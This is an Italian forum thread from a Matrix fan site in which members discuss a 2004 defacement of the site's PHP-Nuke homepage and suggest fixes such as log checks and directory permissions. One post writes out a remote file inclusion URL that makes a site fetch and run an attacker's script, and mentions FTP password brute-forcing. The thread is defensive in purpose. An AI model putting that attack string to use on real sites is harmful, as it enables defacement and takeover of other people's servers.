WhatIsTheMatrix.IT – Il Sito Italiano su Matrix
WhatIsTheMatrix.IT – Il Sito Italiano su Matrix
WhatIsTheMatrix.IT – Il Sito Italiano su MatrixHome // Forum
Hacking
Cita da morpheus su 26 Aprile 2004, 12:37A quanto pare qualcuno oggi si è divertito a bucare l'home page di WITM.it. Per carità, nulla di trascendentale. Nessun danno a parte l'articolo di Konte parzialmente modificato, come potete vedere dallo screenshot che segue:
http://www.whatisthematrix.it/images/forum/hacching_lowres.jpg
L'immagine che potete vedere nello shot dovrebbe essere di un movimento di liberazione indonesiano.
Ecco il loro sito:
http://www.kpu.go.id/english/
Chi ha tempo e voglia di informarsi su lorsignori, può farlo tranquillamente postando qui ciò che ha scovato... 😉
A quanto pare qualcuno oggi si è divertito a bucare l'home page di WITM.it. Per carità, nulla di trascendentale. Nessun danno a parte l'articolo di Konte parzialmente modificato, come potete vedere dallo screenshot che segue:
http://www.whatisthematrix.it/images/forum/hacching_lowres.jpg
L'immagine che potete vedere nello shot dovrebbe essere di un movimento di liberazione indonesiano.
Ecco il loro sito:
Chi ha tempo e voglia di informarsi su lorsignori, può farlo tranquillamente postando qui ciò che ha scovato... 😉
Cita da darknet su 26 Aprile 2004, 13:02Secondo me si sono divertiti a modificare l'articolo , magari sono solo dei newbie.
Secondo me si sono divertiti a modificare l'articolo , magari sono solo dei newbie.
Cita da Dambala su 26 Aprile 2004, 15:27Strana la cosa...
Stai usando PHPNuke vero morole-playerheus'
Non ci dovrebbero essere problemi simili.A me hanno tirato già qualche sito (non gli stessi), ma perchè c'era un buco sulla configurazione del server e anche uno nei miei scripts... :fumato:
PS: Ora che ci penso anch'io usa Aruba, ed il problema derivava da una erronea impostazione dei diritti di alcune directory,
Strana la cosa...
Stai usando PHPNuke vero morole-playerheus'
Non ci dovrebbero essere problemi simili.
A me hanno tirato già qualche sito (non gli stessi), ma perchè c'era un buco sulla configurazione del server e anche uno nei miei scripts... :fumato:
PS: Ora che ci penso anch'io usa Aruba, ed il problema derivava da una erronea impostazione dei diritti di alcune directory,
Cita da morpheus su 26 Aprile 2004, 16:04PS: Ora che ci penso anch'io usa Aruba, ed il problema derivava da una erronea impostazione dei diritti di alcune directory,
Strano. Aruba ha da poco avuto la "geniale" idea di obbligare gli utenti a mantenere i permessi a 755. Tra l'altro nn credo che il tizio abbia avuto accesso tramite ftp (li systema me l'avrebbe segnalato). Io credo che abbia hackato la/le password di amministrazione...
PS: Ora che ci penso anch'io usa Aruba, ed il problema derivava da una erronea impostazione dei diritti di alcune directory,
Strano. Aruba ha da poco avuto la "geniale" idea di obbligare gli utenti a mantenere i permessi a 755. Tra l'altro nn credo che il tizio abbia avuto accesso tramite ftp (li systema me l'avrebbe segnalato). Io credo che abbia hackato la/le password di amministrazione...
Cita da Dambala su 26 Aprile 2004, 16:52I siti su Aruba (tra cui i miei) sono stati bucati perchè i diritti (che poi come dici tu, aruba ha imposto) non erano impostati a dovere (io ad esempio prima facevo l'upload con windows e quindi addio flags).
Inoltre su Aruba era impostato (non so se lo è ancora) il parametro che permette agli script PHP di includere degli script remoti.Io usavo un (troppo) semplice systema:
[code:1:8a653b7c7d]http://nomedominio/index.php'file=contatti.php[/code:1:8a653b7c7d]
ed includevo i vari files del sito sempre in index.php.in pratica ecco che comando hanno lanciato per bucare:
[code:1:8a653b7c7d]http://nomedominio/index.php'file=http://dominio_loro/script_malevolo.php[/code:1:8a653b7c7d]Il mio sito semplicemente ha eseguito il loro script che ha sovrascritto il file index.php.
In pratica il "lavoro" che hanno fatto su Witm è stato semplicemente modificare un HTML, e questo lo avrebbero potuto tranquillamente fare col metodo di sopra...Non so se phpNUKE ha altri buchi di questo tipo, , mi sembra (potrei sbagliarmi) che ce ne fosse uno simile nello script della gallery.
Un altra cosa da notare è che se un sito su Aruba viene bucato, a causa degli inefficienti schemi di protezione è possibile alterare gli altri domini presenti sullo stesso server!
Io per pararmi un po il c__o (dato che uso solo scripts miei) ho criptato un po i comandi passati tramite URL e ho imbastardito i controlli relativi alle inclusioni.
Ora sto aspettando il prossimo attacco 👿
I siti su Aruba (tra cui i miei) sono stati bucati perchè i diritti (che poi come dici tu, aruba ha imposto) non erano impostati a dovere (io ad esempio prima facevo l'upload con windows e quindi addio flags).
Inoltre su Aruba era impostato (non so se lo è ancora) il parametro che permette agli script PHP di includere degli script remoti.
Io usavo un (troppo) semplice systema:
[code:1:8a653b7c7d]http://nomedominio/index.php'file=contatti.php[/code:1:8a653b7c7d]
ed includevo i vari files del sito sempre in index.php.
in pratica ecco che comando hanno lanciato per bucare:
[code:1:8a653b7c7d]http://nomedominio/index.php'file=http://dominio_loro/script_malevolo.php[/code:1:8a653b7c7d]
Il mio sito semplicemente ha eseguito il loro script che ha sovrascritto il file index.php.
In pratica il "lavoro" che hanno fatto su Witm è stato semplicemente modificare un HTML, e questo lo avrebbero potuto tranquillamente fare col metodo di sopra...
Non so se phpNUKE ha altri buchi di questo tipo, , mi sembra (potrei sbagliarmi) che ce ne fosse uno simile nello script della gallery.
Un altra cosa da notare è che se un sito su Aruba viene bucato, a causa degli inefficienti schemi di protezione è possibile alterare gli altri domini presenti sullo stesso server!
Io per pararmi un po il c__o (dato che uso solo scripts miei) ho criptato un po i comandi passati tramite URL e ho imbastardito i controlli relativi alle inclusioni.
Ora sto aspettando il prossimo attacco 👿
Cita da theArchitect su 26 Aprile 2004, 17:38phpNUKE nn ha buchi... È un buco! un unico grosso mega enorme buco. puoi entrare da ogni punto.
aruba non è il massimo, per quello io uso freeweb, costa un pò di più ma ha più servizi.
comunque è difficile hackerare una pwd da FTP anche se scrivere un bel programma in Assembly che ti fa il bruteforce delle pwd nn è proprio impossibile.tra l'altro quando si include un file nn si dovrebbe usare quel systema in chiaro, che tra l'altro è quello che usa phpnuke (name=xxx dove xxx è il nome del modulo da caricare).
il parametro meglio passarlo con get (m pare) che non rende mette la variabile nell'url. oppure la cosa migliore è fare così:
all'inizio il file php controlla le cartelle designate che comprendono le varie sezioni e genera un hash (io di solito uso md5) per ogni cartella. poi si passa il parametro in md5 e avviene il riconoscimento tramite quello.
oppure i parametri possono essere immagazinati in un database e cercati con un query. boh! c sono tanti modi per difendersi... e altrettanti per bucare.domanda: l'immagine era messa sul server di witm o ripescata al volo dal loro sito'
dubito che siano entrati sfruttando un buco del forum. sinceramente ritengo più probabile che sia stata bucata direttamente la shell. la pass era poi stata cambiata'
3 sono le cose da controllare:
-i log di accesso al sito (rootlogslog)
-i log del forum (se attivati)
-l'history della bash
ovviamente restringendo il campo di ricerca al momento presunto dell'attacco.
fammi sapere se trovi qlc...secondo me hanno trovato il sito con uno scanner che scanna un range di IP alla ricerca di server con dei buchi conosciuti. nel sito c'è qualcosa in perl' comunque ti consiglio di usare questo programmi contro te stesso per vedere se (e quali)buchi hai. xò nn so se sia legale... nemmeno se lo facciamo noi a noi stessi... boh!
phpNUKE nn ha buchi... È un buco! un unico grosso mega enorme buco. puoi entrare da ogni punto.
aruba non è il massimo, per quello io uso freeweb, costa un pò di più ma ha più servizi.
comunque è difficile hackerare una pwd da FTP anche se scrivere un bel programma in Assembly che ti fa il bruteforce delle pwd nn è proprio impossibile.
tra l'altro quando si include un file nn si dovrebbe usare quel systema in chiaro, che tra l'altro è quello che usa phpnuke (name=xxx dove xxx è il nome del modulo da caricare).
il parametro meglio passarlo con get (m pare) che non rende mette la variabile nell'url. oppure la cosa migliore è fare così:
all'inizio il file php controlla le cartelle designate che comprendono le varie sezioni e genera un hash (io di solito uso md5) per ogni cartella. poi si passa il parametro in md5 e avviene il riconoscimento tramite quello.
oppure i parametri possono essere immagazinati in un database e cercati con un query. boh! c sono tanti modi per difendersi... e altrettanti per bucare.
domanda: l'immagine era messa sul server di witm o ripescata al volo dal loro sito'
dubito che siano entrati sfruttando un buco del forum. sinceramente ritengo più probabile che sia stata bucata direttamente la shell. la pass era poi stata cambiata'
3 sono le cose da controllare:
-i log di accesso al sito (rootlogslog)
-i log del forum (se attivati)
-l'history della bash
ovviamente restringendo il campo di ricerca al momento presunto dell'attacco.
fammi sapere se trovi qlc...
secondo me hanno trovato il sito con uno scanner che scanna un range di IP alla ricerca di server con dei buchi conosciuti. nel sito c'è qualcosa in perl' comunque ti consiglio di usare questo programmi contro te stesso per vedere se (e quali)buchi hai. xò nn so se sia legale... nemmeno se lo facciamo noi a noi stessi... boh!
Cita da morpheus su 26 Aprile 2004, 18:12I siti su Aruba (tra cui i miei) sono stati bucati perchè i diritti (che poi come dici tu, aruba ha imposto) non erano impostati a dovere (io ad esempio prima facevo l'upload con windows e quindi addio flags).
Non sono un programmatore, ma un appassionato di Matrix che ha dovuto inventarsi webmaster per creare quello che vedete. Come si ovvia a quanto da te menzionato' Come dovrei fare l'upload dei file' Considera che il mio hosting è su server linux...
Inoltre su Aruba era impostato (non so se lo è ancora) il parametro che permette agli script PHP di includere degli script remoti.
Io usavo un (troppo) semplice systema:
[code:1:dfd9d6766a]http://nomedominio/index.php'file=contatti.php[/code:1:dfd9d6766a]
ed includevo i vari files del sito sempre in index.php.in pratica ecco che comando hanno lanciato per bucare:
[code:1:dfd9d6766a]http://nomedominio/index.php'file=http://dominio_loro/script_malevolo.php[/code:1:dfd9d6766a]Il mio sito semplicemente ha eseguito il loro script che ha sovrascritto il file index.php.
In pratica il "lavoro" che hanno fatto su Witm è stato semplicemente modificare un HTML, e questo lo avrebbero potuto tranquillamente fare col metodo di sopra...Può darsi. Ho da poco apportato delle modifiche in alcuni files che dovrebbero bloccare malintenzionati. Vedi... il problema nn è tanto il fatto che abbiano modificato un articolo, quanto il fatto che siano stati in grado di diventare GOD ADMIN (come il sottoscritto) e pertanto con un controllo pressocché totale sul sito. Tra l'altro un GOD ADMIN non può nemmeno esser cancellato usando phpnuke (contrariamente a quanto avviene con gli admin "normali"), ma occorre agire direttamente sul DB mysql. Ed è proprio quello che ho fatto: l'ho cancellato suando phpmyadmin...
I siti su Aruba (tra cui i miei) sono stati bucati perchè i diritti (che poi come dici tu, aruba ha imposto) non erano impostati a dovere (io ad esempio prima facevo l'upload con windows e quindi addio flags).
Non sono un programmatore, ma un appassionato di Matrix che ha dovuto inventarsi webmaster per creare quello che vedete. Come si ovvia a quanto da te menzionato' Come dovrei fare l'upload dei file' Considera che il mio hosting è su server linux...
Inoltre su Aruba era impostato (non so se lo è ancora) il parametro che permette agli script PHP di includere degli script remoti.
Io usavo un (troppo) semplice systema:
[code:1:dfd9d6766a]http://nomedominio/index.php'file=contatti.php[/code:1:dfd9d6766a]
ed includevo i vari files del sito sempre in index.php.in pratica ecco che comando hanno lanciato per bucare:
[code:1:dfd9d6766a]http://nomedominio/index.php'file=http://dominio_loro/script_malevolo.php[/code:1:dfd9d6766a]Il mio sito semplicemente ha eseguito il loro script che ha sovrascritto il file index.php.
In pratica il "lavoro" che hanno fatto su Witm è stato semplicemente modificare un HTML, e questo lo avrebbero potuto tranquillamente fare col metodo di sopra...
Può darsi. Ho da poco apportato delle modifiche in alcuni files che dovrebbero bloccare malintenzionati. Vedi... il problema nn è tanto il fatto che abbiano modificato un articolo, quanto il fatto che siano stati in grado di diventare GOD ADMIN (come il sottoscritto) e pertanto con un controllo pressocché totale sul sito. Tra l'altro un GOD ADMIN non può nemmeno esser cancellato usando phpnuke (contrariamente a quanto avviene con gli admin "normali"), ma occorre agire direttamente sul DB mysql. Ed è proprio quello che ho fatto: l'ho cancellato suando phpmyadmin...
Cita da Dambala su 26 Aprile 2004, 18:51Come si ovvia a quanto da te menzionato'
Non si può. Se il problema è solamente una errata impostazione di Aruba, "loro" possono entrare tranquillamente nonostante tutti i settaggi tu possa fare sul lato applicativo.
Purtroppo il server non è nostro e quindi non possiamo smanettare sui files di configurazione di systema.
Spero si decidano a proposito...
A me avevano postato (dopo gli attacchi) questo:Gentile cliente,
alcuni files presenti all'interno dello spazio web associato al dominio UNDOMINIO.it potrebbero risultare assenti o parzialmente sovrascritti.
Nel caso in cui il file mancante sia la Home page (index.htm, index.php ecc). troverà al suo posto una pagina di default.
La causa è già stata individuata e sono state apportate le modifiche necessarie ad evitare il ripetersi del problema.Ci scusiamo per il disagio.
Ma non mi sembra che le cose vadano meglio ora...
Come dovrei fare l'upload dei file'
Bhe se fai l'upload con linux non ci sono problemi, ammesso che i files abbiano i permessi 755 da te mensionati.
Se fai l'upload con windows, non mi ricordo ma credo che i diritti vengano impostati a 777. Ma se non fai upload di scripts allora nessun problema.Purtroppo è un po che voglio sperimentare con phpNUKE, ma non ho ancora avuto tempo, quindi non so essere più preciso.
Vedi... il problema nn è tanto il fatto che abbiano modificato un articolo, quanto il fatto che siano stati in grado di diventare GOD ADMIN (come il sottoscritto) e pertanto con un controllo pressocché totale sul sito.
Non so... se sono entrati col trucchetto dell'url (che sicuramente è un metodo gettonato), hanno modificato/creato qualche script da cui hanno generato l'account su NUKE.
Pensa che se avessero voluto avrebbero potuto tranquillamente trasformare il sito in una sorgente perenne di mail spam o di protesta, quelli si che sarebbero stati "uccelli senza zucchero" (cit. Tomas Milian).il parametro meglio passarlo con get (m pare) che non rende mette la variabile nell'url[/url]
Il metodo POST non invia i parametri tramite url, ma non è utilizzabile per i link (modo GET).
all'inizio il file php controlla le cartelle designate che comprendono le varie sezioni e genera un hash (io di solito uso md5) per ogni cartella. poi si passa il parametro in md5 e avviene il riconoscimento tramite quello.
Il metodo che esponi è veramente comodo, ma non è pesante calcolare l'hash delle directory ogni volta'
Certo lo puoi memorizzare su un file, ma quando il contenuto delle directory cambia'Anch'io sto cercando un metodo decente per passare i parametri in sicurezza, ma che comunque mi garantisca un bella libertà, dato che ho per uno stesso sito molti (decine) di script che si passano grovigli di parametri.
secondo me hanno trovato il sito con uno scanner che scanna un range di IP alla ricerca di server con dei buchi conosciuti
Già, lo stesso systema che usano gli worm di ultima generazione...
Come si ovvia a quanto da te menzionato'
Non si può. Se il problema è solamente una errata impostazione di Aruba, "loro" possono entrare tranquillamente nonostante tutti i settaggi tu possa fare sul lato applicativo.
Purtroppo il server non è nostro e quindi non possiamo smanettare sui files di configurazione di systema.
Spero si decidano a proposito...
A me avevano postato (dopo gli attacchi) questo:
Gentile cliente,
alcuni files presenti all'interno dello spazio web associato al dominio UNDOMINIO.it potrebbero risultare assenti o parzialmente sovrascritti.
Nel caso in cui il file mancante sia la Home page (index.htm, index.php ecc). troverà al suo posto una pagina di default.
La causa è già stata individuata e sono state apportate le modifiche necessarie ad evitare il ripetersi del problema.Ci scusiamo per il disagio.
Ma non mi sembra che le cose vadano meglio ora...
Come dovrei fare l'upload dei file'
Bhe se fai l'upload con linux non ci sono problemi, ammesso che i files abbiano i permessi 755 da te mensionati.
Se fai l'upload con windows, non mi ricordo ma credo che i diritti vengano impostati a 777. Ma se non fai upload di scripts allora nessun problema.
Purtroppo è un po che voglio sperimentare con phpNUKE, ma non ho ancora avuto tempo, quindi non so essere più preciso.
Vedi... il problema nn è tanto il fatto che abbiano modificato un articolo, quanto il fatto che siano stati in grado di diventare GOD ADMIN (come il sottoscritto) e pertanto con un controllo pressocché totale sul sito.
Non so... se sono entrati col trucchetto dell'url (che sicuramente è un metodo gettonato), hanno modificato/creato qualche script da cui hanno generato l'account su NUKE.
Pensa che se avessero voluto avrebbero potuto tranquillamente trasformare il sito in una sorgente perenne di mail spam o di protesta, quelli si che sarebbero stati "uccelli senza zucchero" (cit. Tomas Milian).
il parametro meglio passarlo con get (m pare) che non rende mette la variabile nell'url[/url]
Il metodo POST non invia i parametri tramite url, ma non è utilizzabile per i link (modo GET).
all'inizio il file php controlla le cartelle designate che comprendono le varie sezioni e genera un hash (io di solito uso md5) per ogni cartella. poi si passa il parametro in md5 e avviene il riconoscimento tramite quello.
Il metodo che esponi è veramente comodo, ma non è pesante calcolare l'hash delle directory ogni volta'
Certo lo puoi memorizzare su un file, ma quando il contenuto delle directory cambia'
Anch'io sto cercando un metodo decente per passare i parametri in sicurezza, ma che comunque mi garantisca un bella libertà, dato che ho per uno stesso sito molti (decine) di script che si passano grovigli di parametri.
secondo me hanno trovato il sito con uno scanner che scanna un range di IP alla ricerca di server con dei buchi conosciuti
Già, lo stesso systema che usano gli worm di ultima generazione...
Cita da Adam_Burton su 27 Aprile 2004, 11:12Stiamo diventando famosi allora.....adesso ci bucano la homepage.... significa che siamo in vista!!!!!!
Stiamo diventando famosi allora.....adesso ci bucano la homepage.... significa che siamo in vista!!!!!!
Cita da SeraphAngel su 27 Aprile 2004, 11:19Ma cosa dobbiamo aspettarci da questa situazione' Nulla è più sicuro al giorno d'oggi'(so già la risposta a questa domanda..).
Il punto è: e se mandassero tutto all'aria...tutto il sito'
Bisogna fare qualcosa...e presto. Anche in previsione di futuri guai di questo tipo.
Adesso nessuno è più sicuro come prima. Bisognerebbe tranquillizzare un pò tutti gli utenti di WITM.IT, se possibile. Almeno penso.
Se l'hanno fatto una volta nulla li vieta di rifarlo. Ma perchè'
Comunque penso che non lo rifaranno di nuovo...
Almeno spero. 😯 😯 😯
E' una gran brutta faccenda. 😯 😯Seraph
Ma cosa dobbiamo aspettarci da questa situazione' Nulla è più sicuro al giorno d'oggi'(so già la risposta a questa domanda..).
Il punto è: e se mandassero tutto all'aria...tutto il sito'
Bisogna fare qualcosa...e presto. Anche in previsione di futuri guai di questo tipo.
Adesso nessuno è più sicuro come prima. Bisognerebbe tranquillizzare un pò tutti gli utenti di WITM.IT, se possibile. Almeno penso.
Se l'hanno fatto una volta nulla li vieta di rifarlo. Ma perchè'
Comunque penso che non lo rifaranno di nuovo...
Almeno spero. 😯 😯 😯
E' una gran brutta faccenda. 😯 😯
Seraph